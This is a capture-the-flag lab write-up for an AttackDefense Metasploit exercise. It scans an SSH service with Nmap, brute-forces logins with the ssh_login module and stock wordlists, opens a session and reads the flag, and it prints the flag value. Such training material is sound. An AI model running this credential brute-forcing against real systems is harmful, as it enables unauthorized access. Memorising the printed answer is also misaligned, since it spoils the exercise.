Name SSH Login

URL https://attackdefense.com/challengedetails?cid=1526

Type Metasploit: Auxiliary Modules

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

Step 1:​ Run an Nmap scan against the target IP.

Command: nmap -sS -sV 192.245.211.3

Step 2: ​We have discovered ssh service is running on the target machine. We will use the
provided auxiliary modules against target.

Commands:
msfconsole
use auxiliary/scanner/ssh/ssh_version
set RHOSTS ​192.245.211.3
exploit
We will now use ssh_login module to find the valid credentials to access the ssh server.

use auxiliary/scanner/ssh/ssh_login
set RHOSTS ​192.245.211.3
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/​common_passwords.txt
set STOP_ON_SUCCESS true
set VERBOSE true
exploit
Step 3: ​Find the flag

Commands:
sessions
sessions -i 1
find / -name "flag"
cat /flag
This reveals the flag to us.

Flag: ​eb09cc6f1cd72756da145892892fbf5a

References

1. SSH (​https://en.wikipedia.org/wiki/Secure_Shell​)
2. Telnet Login Auxiliary Module
(​https://www.rapid7.com/db/modules/​auxiliary/scanner/ssh/ssh_login​)
3. Telnet Version Detection Auxiliary Module
(​https://www.rapid7.com/db/modules/​auxiliary/scanner/ssh/ssh_version​)